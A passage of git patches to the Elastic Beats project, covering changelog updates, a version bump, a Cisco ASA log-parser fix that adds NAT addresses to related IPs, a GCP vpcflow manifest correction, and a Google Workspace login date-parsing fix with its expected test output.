Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] -- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* @@ -501,97 +396,13 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add related.hosts ecs field to all modules {pull}21160[21160] - Keep cursor state between httpjson input restarts {pull}20751[20751] - New juniper.srx dataset for Juniper SRX logs. {pull}20017[20017] -- Adding support for Microsoft 365 Defender (Microsoft Threat Protection) {pull}21446[21446] -- Adding support for FIPS in s3 input {pull}21446[21446] -- Adding support for Oracle Database Audit Logs {pull}21991[21991] -- Add max_number_of_messages config into s3 input. {pull}21993[21993] -- Update Okta documentation for new stateful restarts. {pull}22091[22091] -- Add SSL option to checkpoint module {pull}19560[19560] -- Added support for MySQL Enterprise audit logs. {pull}22273[22273] -- Rename googlecloud module to gcp module. {pull}22214[22214] -- Rename awscloudwatch input to aws-cloudwatch. {pull}22228[22228] -- Rename google-pubsub input to gcp-pubsub. {pull}22213[22213] -- Copy tag names from MISP data into events. {pull}21664[21664] - Added DNS response IP addresses to `related.ip` in Suricata module. {pull}22291[22291] -- Added TLS JA3 fingerprint, certificate not_before/not_after, certificate SHA1 hash, and certificate subject fields to Zeek SSL dataset. {pull}21696[21696] -- Add platform logs in the azure filebeat module. {pull}22371[22371] -- Added `event.ingested` field to data from the Netflow module. {pull}22412[22412] -- Improve panw ECS url fields mapping. {pull}22481[22481] -- Improve Nats filebeat dashboard. {pull}22726[22726] -- Add support for UNIX datagram sockets in `unix` input. {issues}18632[18632] {pull}22699[22699] -- Add `http.request.mime_type` for Elasticsearch audit log fileset. {pull}22975[22975] -- Add new httpjson input features and mark old config ones for deprecation {pull}22320[22320] -- Add configuration option to set external and internal networks for panw panos fileset {pull}22998[22998] -- Add `subbdomain` fields for rsa2elk modules. {pull}23035[23035] -- Add subdomain enrichment for suricata/eve fileset. {pull}23011[23011] -- Add subdomain enrichment for zeek/dns fileset. {pull}23011[23011] -- Add `event.category` "configuration" to auditd module events. {pull}23010[23010] -- Add `event.category` "configuration" to gsuite module events. {pull}23010[23010] -- Add `event.category` "configuration" to o365 module events. {pull}23010[23010] -- Add `event.category` "configuration" to zoom module events. {pull}23010[23010] -- Add `network.direction` to auditd/log fileset. {pull}23041[23041] -- Add logic for external network.direction in sophos xg fileset {pull}22973[22973] -- Preserve AWS CloudTrail eventCategory in aws.cloudtrail.event_category. {issue}22776[22776] {pull}22805[22805] -- Add top_level_domain enrichment for suricata/eve fileset. {pull}23046[23046] -- Add top_level_domain enrichment for zeek/dns fileset. {pull}23046[23046] -- Add `observer.egress.zone` and `observer.ingress.zone` for cisco/asa and cisco/ftd filesets. {pull}23068[23068] -- Allow cisco/asa and cisco/ftd filesets to override network directionality based off of zones. {pull}23068[23068] -- Allow cef and checkpoint modules to override network directionality based off of zones {pull}23066[23066] -- Add `network.direction` to netflow/log fileset. {pull}23052[23052] -- Add the ability to override `network.direction` based on interfaces in Fortinet/firewall fileset. {pull}23072[23072] -- Add `network.direction` override by specifying `internal_networks` in gcp module. {pull}23081[23081] -- Migrate microsoft/defender_atp to httpjson v2 config {pull}23017[23017] -- Migrate microsoft/m365_defender to httpjson v2 config {pull}23018[23018] -- Migrate okta to httpjson v2 config {pull}23059[23059] -- Add support for Snyk Vulnerability and Audit API. {pull}22677[22677] -- Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] -- Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] -- Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] -- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] -- Added support for first_event context in filebeat httpjson input {pull}23437[23437] -- Added `alternative_host` option to google pubsub input {pull}23215[23215] -- Adding Threat Intel module {pull}21795[21795] -- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] -- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] -- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by - removing unsupported processors. {pull}23763[23763] -- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] -- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] -- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] -- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] -- Move aws-s3 input to GA. {pull}23631[23631] -- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] -- Added string splitting for httpjson input {pull}24022[24022] -- Added Signatures fileset to Zeek module {pull}23772[23772] -- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] -- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] -- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] -- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] -- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] -- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] -- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] -- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] -- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] -- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] -- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] -- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] -- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] -- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] -- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] -- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] -- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] -- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] -- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] -- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] *Heartbeat* -- Add mime type detection for http responses. {pull}22976[22976] -- Bundle synthetics deps with heartbeat docker image. {pull}23274[23274] *Heartbeat* -- Update Journalbeat to ECS 1.8. {pull}23737[23737] *Heartbeat* @@ -650,54 +461,22 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add billing metricset into googlecloud module. {pull}20812[20812] {issue}20738[20738] - Release lambda metricset in aws module as GA. {issue}21251[21251] {pull}21255[21255] - Add dashboard for pubsub metricset in googlecloud module. {pull}21326[21326] {issue}17137[17137] -- Move Prometheus query & remote_write to GA. {pull}21507[21507] -- Map cloud data filed `cloud.account.id` to azure subscription. {pull}21483[21483] {issue}21381[21381] -- Expand unsupported option from namespace to metrics in the azure module. {pull}21486[21486] -- Move s3_daily_storage and s3_request metricsets to use cloudwatch input. {pull}21703[21703] -- Duplicate system.process.cmdline field with process.command_line ECS field name. {pull}22325[22325] -- Add awsfargate module task_stats metricset to monitor AWS ECS Fargate. {pull}22034[22034] -- Add connection and route metricsets for nats metricbeat module to collect metrics per connection/route. {pull}22445[22445] -- Add unit file states to system/service {pull}22557[22557] -- `kibana` module: `stats` metricset no-longer collects usage-related data. {pull}22732[22732] -- Add more TCP states to Metricbeat system socket_summary. {pull}14347[14347] -- Add io.ops in fields exported by system.diskio. {pull}22066[22066] -- Adjust the Apache status fields in the fleet mode. {pull}22821[22821] -- Add AWS Fargate overview dashboard. {pull}22941[22941] -- Add process.state, process.cpu.pct, process.cpu.start_time and process.memory.pct. {pull}22845[22845] -- Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] -- Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] -- Release MSSQL as GA {pull}23146[23146] -- Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] -- Add support for Darwin/arm M1. {pull}24019[24019] -- Check fields are documented in aws metricsets. {pull}23887[23887] *Packetbeat* -- Upgrade to ECS 1.8.0. {pull}23783[23783] -- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] *Functionbeat* -- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] -- Add support for multiple regions {pull}21065[21065] *Heartbeat* -- Add support for script processor. {pull}23229[23229] *Winlogbeat* - Set process.command_line and process.parent.command_line from Sysmon Event ID 1. {pull}17327[17327] - Add support for event IDs 4673,4674,4697,4698,4699,4700,4701,4702,4768,4769,4770,4771,4776,4778,4779,4964 to the Security module {pull}17517[17517] - Add registry and code signature information and ECS categorization fields for sysmon module {pull}18058[18058] -- Add file.pe and process.pe fields to ProcessCreate & LoadImage events in Sysmon module. {issue}17335[17335] {pull}22217[22217] -- Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] -- Add additional event categorization for security and sysmon modules. {pull}22988[22988] -- Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] -- Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] -- Add new ECS 1.8 improvements. {pull}23563[23563] -- Remove deprecated eventlogging api that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] *Elastic Log Driver* @@ -707,10 +486,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Affecting all Beats* -- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as - a hostname when Subject Alternative Name is not present from v8.0. - Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new - major version of Beats. *Filebeat* diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index 7c6f3aa2a164..a53bf859bc3f 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc @@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> From dbdc5aa212f9dfb46709d136aab817858e4bb15a Mon Sep 17 00:00:00 2001 From: Elastic Machine Date: Tue, 23 Mar 2021 08:47:50 -0400 Subject: [PATCH 08/20] chore: update version (#24096) Co-authored-by: Andres Rodriguez --- libbeat/version/version.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libbeat/version/version.go b/libbeat/version/version.go index dbc89317a81a..e90c5f6335c8 100644 --- a/libbeat/version/version.go +++ b/libbeat/version/version.go @@ -18,4 +18,4 @@ // Code generated by dev-tools/set_version package version -const defaultBeatVersion = "7.12.0" +const defaultBeatVersion = "7.12.1" From eb6959df4fca8341f243f3ceafc58b7c89b22b03 Mon Sep 17 00:00:00 2001 From: Lee Hinman <57081003+leehinman@users.noreply.github.com> Date: Tue, 23 Mar 2021 10:16:54 -0500 Subject: [PATCH 09/20] [Filebeat] Fix cisco asa parser for message 302022 (#24697) (#24712) * Fix cisco asa parser for message 302022 - fix parser to include mapped address and ports - add NAT addresses to related.ip Closes #24695 Closes #24405 (cherry picked from commit c685997eeff4c9ca1732749e27cd9df8a89e322b) --- CHANGELOG.next.asciidoc | 1 + .../additional_messages.log-expected.json | 176 +++++++++++++++++- .../asa/test/hostnames.log-expected.json | 3 + .../cisco/asa/test/sample.log-expected.json | 10 +- .../cisco/ftd/test/sample.log-expected.json | 13 +- .../cisco/shared/ingest/asa-ftd-pipeline.yml | 12 +- 6 files changed, 204 insertions(+), 11 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 91fecb4957b4..29f2d3e114f3 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -200,6 +200,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix Cisco ASA parser for message 722051. {pull}24410[24410] - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] +- Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] *Heartbeat* diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index 2578835b3d0a..6d4d77a6515f 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -45,7 +45,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -103,7 +105,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -151,6 +155,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -285,6 +290,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -340,7 +346,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -615,6 +623,7 @@ ], "related.ip": [ "10.10.10.10", + "8.8.8.8", "192.168.2.2" ], "service.type": "cisco", @@ -749,6 +758,7 @@ ], "related.ip": [ "10.192.46.90", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -796,6 +806,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -909,6 +920,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -1237,7 +1249,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1295,7 +1309,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1603,6 +1619,156 @@ "forwarded" ] }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw1111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4472, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw1111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4631, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.1682.2.2", + "destination.domain": "192.1682.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4791, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01", + "192.1682.2.2" + ], + "related.ip": [ + "10.10.10.10" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, { "cisco.asa.destination_interface": "net", "cisco.asa.message_id": "302023", diff --git a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json index 70df45cbf917..6fd963a60379 100644 --- a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json @@ -36,6 +36,9 @@ "target.destination.hostname.local", "Prod-host.name.addr" ], + "related.ip": [ + "10.0.55.66" + ], "service.type": "cisco", "source.domain": "Prod-host.name.addr", "source.nat.ip": "10.0.55.66", diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json index b2c1d4cb8767..33d9e610b246 100644 --- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json @@ -451,6 +451,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -554,7 +555,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -812,7 +814,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3335,6 +3338,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3393,6 +3397,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", @@ -3450,6 +3455,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index d416dcb068c8..ed414710ed2b 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -442,6 +442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -543,7 +544,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -796,7 +798,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -3321,6 +3324,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3379,7 +3383,9 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", - "192.0.2.223" + "10.2.1.1", + "192.0.2.223", + "192.0.2.225" ], "service.type": "cisco", "source.address": "10.1.1.1", @@ -3436,6 +3442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index b76b7a69a20b..ff260fe989b7 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml @@ -318,7 +318,7 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '302022'" field: "message" - pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}" + pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" field: "message" @@ -1614,11 +1614,21 @@ processors: value: "{{source.ip}}" if: "ctx?.source?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{source.nat.ip}}" + if: "ctx?.source?.nat?.ip != null" + allow_duplicates: false - append: field: related.ip value: "{{destination.ip}}" if: "ctx?.destination?.ip != null" allow_duplicates: false + - append: + field: related.ip + value: "{{destination.nat.ip}}" + if: "ctx?.destination?.nat?.ip != null" + allow_duplicates: false - append: field: related.user value: "{{user.name}}" From cc7b7d808ad598048d7d908e61195dc450122baa Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 15:01:23 -0400 Subject: [PATCH 10/20] Cherry-pick #24719 to 7.12: [Filebeat] Fix gcp/vpcflow module defaulting to file input (#24734) The pubsub input was renamed from google-pubsub to gcp-pubsub and the vpcflow filesets manifest was not updated. As a result it's defaulting to the file input. This fixes the manifest. The workaround is to explicitly set the input type: vpcflow: enabled: true var.input: gcp-pubsub (cherry picked from commit 4f9194749fed812ac19daf650f89f504c934733f) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/module/gcp/vpcflow/manifest.yml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 29f2d3e114f3..4d95d7ff6db6 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] *Heartbeat* diff --git a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml index 1f67548e0dbd..4cd314d574f6 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml @@ -2,7 +2,7 @@ module_version: "1.0" var: - name: input - default: google-pubsub + default: gcp-pubsub - name: project_id default: SET_PROJECT_NAME - name: topic From d002be88111c84c40669aa7f3849e175fdfe8345 Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Wed, 24 Mar 2021 17:24:15 -0400 Subject: [PATCH 11/20] [Filebeat] Fix date parsing in GSuite/Google Workspace modules (#24696) (#24736) * Fix date parsing in GSuite/login fileset The format of Date#toUTCString was incompatible with the format accepted by Elasticsearch by default. By writing a Date object from the JS pipeline this becomes a time.Time in the event that is formatted by common.Time when going out as JSON. Fixes #24694 * Apply fix to google_workspace Fixes #24692 (cherry picked from commit a4a3ff0c8f85c9b4e8e00cda57af6036b3a66678) --- CHANGELOG.next.asciidoc | 4 +- .../google_workspace/login/config/pipeline.js | 2 +- .../test/login-test.json.log-expected.json | 225 ++++++++++++++++++ .../module/gsuite/login/config/pipeline.js | 2 +- .../gsuite-login-test.json.log-expected.json | 209 ++++++++++++++++ 5 files changed, 437 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 4d95d7ff6db6..5996e2490954 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -201,6 +201,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `google_workspace` pagination. {pull}24668[24668] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] - Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] - Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] *Heartbeat* @@ -209,9 +210,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fixed scheduler shutdown issues which would in rare situations cause a panic due to semaphore misuse. {pull}16397[16397] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -*Heartbeat* - - *Journalbeat* diff --git a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js index 9f9610393f1c..a7b54afd43e0 100644 --- a/x-pack/filebeat/module/google_workspace/login/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/login/config/pipeline.js @@ -64,7 +64,7 @@ var login = (function () { // this is a timestamp in microseconds case "timestamp": var millis = p.intValue / 1000; - evt.Put("event.start", new Date(millis).toUTCString()); + evt.Put("event.start", new Date(millis)); break; case "challenge_status": if (p.value === "Challenge Passed") { diff --git a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json index 48f7038df80e..a4e0f4800403 100644 --- a/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/login/test/login-test.json.log-expected.json @@ -55,6 +55,174 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 406, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_login_less_secure_app", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": 